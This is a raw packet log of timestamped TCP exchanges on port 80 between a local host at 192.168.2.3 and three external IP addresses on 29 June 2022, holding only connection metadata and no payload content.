Jun 29, 2022 23:12:09.391839981 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.392070055 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.392096043 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.392136097 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.399702072 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.399732113 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.399791002 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.400099039 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.400134087 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.400191069 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.400367975 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.439215899 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.439253092 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.439271927 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.439358950 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.439395905 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.498071909 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.498106003 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.498198032 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.499022007 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.499109030 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.499128103 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.499144077 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.499161959 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.499188900 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.507124901 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.507157087 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.507227898 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.507847071 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.510195971 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.510225058 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.510251999 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.510371923 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.510390043 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.510426998 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.511488914 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.511559010 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.511559963 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.511579037 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.511621952 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.511928082 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.511950016 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.511967897 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.511995077 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.512712002 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.512737036 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.512787104 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.513042927 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.513063908 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.513079882 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.513093948 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.513134003 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.513293028 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.513315916 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.513382912 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.514262915 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.514375925 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.514395952 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.514426947 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.551740885 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.551831007 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.551897049 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.591321945 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.591389894 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.591437101 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.595757961 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.595839024 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.631644964 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.637315989 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.637348890 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.637368917 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.638355970 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.638381958 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.638400078 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.638405085 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.638441086 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.641711950 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.641742945 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.641804934 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.643456936 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.643485069 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.643537045 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.680548906 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.680588961 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.680722952 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.680890083 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.680908918 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.680989981 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.737744093 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.737768888 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.737845898 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.752151966 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.754082918 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.754112005 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.754136086 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.754182100 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.754210949 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.754579067 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.754621029 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.754647017 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.754678011 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.755249023 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.755312920 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.755328894 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.755337000 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.755374908 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.755846977 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.755888939 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.755913019 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.755939007 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.756736040 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.756767035 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.756813049 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.757805109 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.757843018 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.757863998 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.757886887 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.757905006 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.758089066 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.758115053 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.758150101 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.758164883 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.758433104 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.758456945 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.758488894 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.759449005 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.759490013 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.759515047 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.759520054 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.759552002 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.792402983 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.792448044 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.792594910 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.830776930 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.832755089 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.832844973 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.838335991 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.838372946 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.838432074 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.879381895 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.879411936 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.879436970 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.879478931 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.882317066 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.882343054 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.882365942 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.882375956 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.882421017 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.885555983 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.885586023 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.885638952 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.885893106 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.885986090 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.886025906 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.922230005 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.923907995 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.923949003 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.923980951 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.923983097 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.924034119 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.980668068 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.996670008 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.996705055 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.996726036 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.996756077 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.996783972 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.996812105 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.996814013 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.996845961 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.996865034 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.996877909 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.996891975 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.996906996 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.996943951 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.999584913 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.999617100 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.999700069 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.000583887 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.000613928 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.000654936 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.000735044 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.001230955 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.001261950 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.001287937 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.001291037 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.001329899 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.001907110 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.001933098 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.001957893 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.001972914 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.002096891 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.002130032 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.002144098 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.002413988 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.002443075 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.002455950 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.002573013 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.002610922 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.002748013 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.002775908 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.002813101 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.041706085 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.041749001 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.041950941 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.090255976 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.090277910 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.090372086 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.092366934 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.092389107 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.092457056 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.118760109 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.119072914 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.119155884 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.124301910 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.124324083 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.124388933 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.124562979 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.124581099 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.124625921 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.125667095 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.125688076 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.125729084 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.126141071 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.126477957 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.126532078 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.167161942 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.167191029 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.167329073 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.167567968 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.167592049 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.167661905 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.237482071 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.237524033 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.237549067 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.237566948 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.237606049 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.237643957 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.238734007 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.238753080 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.238770008 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.238789082 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.238815069 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.240149021 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.240170002 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.240186930 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.240211964 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.242014885 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.242037058 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.242079973 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.243429899 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.243449926 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.243467093 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.243489981 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.243519068 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.243892908 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.243920088 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.243949890 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.243973017 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.244170904 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.244189024 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.244204998 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.244215012 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.244239092 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.244776964 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.244796991 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.244813919 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.244856119 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.245114088 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.245157003 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.245162010 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.245176077 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.245214939 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.245282888 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.245338917 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.245363951 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.245378017 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.246207952 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.246226072 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.246243000 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.246262074 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.246289968 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.246571064 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.246646881 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.246685982 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.247400045 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.247459888 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.247498989 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.247600079 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.247627020 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.247644901 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.247668982 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.276050091 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.282855988 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.282881021 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.282897949 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.282973051 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.283014059 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.331481934 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.331511974 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.331528902 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.331613064 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.333590031 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.333645105 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.333693027 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.333714962 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.333750010 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.359692097 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.359719992 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.359738111 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.359795094 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.364366055 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.364433050 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.477014065 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:10.477140903 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.480437040 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:10.717919111 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:15.072881937 CEST	49781	80	192.168.2.3	175.119.10.231
Jun 29, 2022 23:12:15.378086090 CEST	80	49781	175.119.10.231	192.168.2.3
Jun 29, 2022 23:12:15.378251076 CEST	49781	80	192.168.2.3	175.119.10.231
Jun 29, 2022 23:12:15.378344059 CEST	49781	80	192.168.2.3	175.119.10.231
Jun 29, 2022 23:12:15.379147053 CEST	49781	80	192.168.2.3	175.119.10.231
Jun 29, 2022 23:12:15.685877085 CEST	80	49781	175.119.10.231	192.168.2.3
Jun 29, 2022 23:12:16.519007921 CEST	80	49781	175.119.10.231	192.168.2.3
Jun 29, 2022 23:12:16.519042015 CEST	80	49781	175.119.10.231	192.168.2.3
Jun 29, 2022 23:12:16.519211054 CEST	49781	80	192.168.2.3	175.119.10.231
Jun 29, 2022 23:12:16.521003962 CEST	49781	80	192.168.2.3	175.119.10.231
Jun 29, 2022 23:12:16.564955950 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:16.770834923 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:16.770931005 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:16.771123886 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:16.771173954 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:16.826271057 CEST	80	49781	175.119.10.231	192.168.2.3
Jun 29, 2022 23:12:17.468589067 CEST	49783	80	192.168.2.3	195.158.3.162
